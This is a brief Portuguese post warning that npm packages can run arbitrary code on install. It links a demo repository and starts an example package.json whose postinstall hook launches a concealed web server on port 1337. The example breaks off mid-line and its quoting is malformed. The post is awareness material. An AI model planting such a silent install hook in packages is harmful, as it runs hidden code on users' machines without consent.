Um pacote npm que você instalou pode se infiltrar no seu computador? Sim pode! Veja como depois do intervalo; vá e apoie o NODE SECURITY PROJECT
Github Repo: https://github.com/johannesboyne/dontdobadthingswithnode
Veja o exemplo a seguir, é um npm mínimo, package.json mas se eu escrever assim, poderei fazer o que quiser em seu sistema se você for instalar meu pacote. Como iniciar um servidor web na porta 1337 e escondê-lo de você .
{
"name": "test",
"scripts": {
"postinstall": "echo 'var http=require("http"");http.createServer(function (req